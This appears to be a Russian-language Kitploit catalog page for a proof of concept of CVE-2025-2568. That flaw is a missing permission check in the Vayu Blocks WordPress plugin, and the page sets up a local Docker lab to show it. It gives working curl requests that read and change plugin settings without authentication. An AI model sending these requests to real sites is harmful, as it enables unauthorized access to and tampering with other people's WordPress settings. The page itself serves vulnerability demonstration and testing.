Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC_CVE-2025-2568 — Доказательство концепции эксплуатации CVE-2025-2568, демонстрирующее несанкционированный доступ и изменение параметров плагина Vayu Blocks для WordPress из-за отсутствия проверок прав доступа. | Kitploit
Инструменты/GitHubGitHub/shinigami-777/poc_cve-2025-2568
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubshinigami-777/poc_cve-2025-2568

PoC_CVE-2025-2568

Доказательство концепции эксплуатации CVE-2025-2568, демонстрирующее несанкционированный доступ и изменение параметров плагина Vayu Blocks для WordPress из-за отсутствия проверок прав доступа.

Репозиторий
10 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC CVE-2025-2568

Обзор

Плагин Vayu Blocks – Gutenberg Blocks для WordPress и WooCommerce уязвим к несанкционированному доступу и изменению данных из-за отсутствия проверок прав доступа в функциях vayu_blocks_get_toggle_switch_values_callback и vayu_blocks_save_toggle_switch_callback в версиях 1.0.4–1.2.1. Это позволяет неаутентифицированным атакующим читать настройки плагина и обновлять любые настройки, имя ключа которых заканчивается на _value.

Шаги эксплуатации

Установка (с использованием docker)

  1. Клонируйте репозиторий и выполните следующие шаги:
    root@kitploit:~
    cd vuln-wordpress
    docker-compose up -d
    
  • Распакуйте Vayu-Plugin в папку wp-content/plugins.
    root@kitploit:~
    cd wp-content/plugins/
    unzip vayu-blocks.1.2.0.zip
    
    Плагин Vayu-blocks (версия 1.2.0) теперь установлен.
  • Эксплуатация:

    1. Используйте это для чтения настроек:
      root@kitploit:~
      curl http://localhost:8080/wp-json/vayu-blocks/v1/get-toggle-values/
      
    2. Отправьте POST-запрос, подобный этому, чтобы изменить значения настроек.
      root@kitploit:~
      curl -X POST http://localhost:8080/wp-json/vayu-blocks/v1/save-toggle-switch \
       -H "Content-Type: application/json" \
       -d '{"key":"container", "value":"new_value"}'
      

    Видео эксплуатации

    wordpressexploit.webm

    Скачать инструмент